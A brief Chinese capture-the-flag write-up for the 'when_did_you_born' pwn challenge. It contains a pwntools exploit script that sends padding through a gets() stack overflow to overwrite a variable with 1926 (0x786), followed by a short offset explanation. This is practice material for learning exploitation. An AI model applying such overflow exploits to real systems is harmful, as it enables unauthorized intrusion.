攻防世界 | when_did_you_born
所以题目要求是输入生日1926
payload:
from pwn import *
io = remote("111.198.29.45",40803)
io.recvline()
io.sendline('1234')
io.recvline()
payload = "A"*8
payload += p64(0x786)
io.sendline(payload)
io.interactive()
解析:
gets存在栈溢出漏洞 ; v4:20h,v5:18h,0x20-0x18=0x8 ; 1926=0x786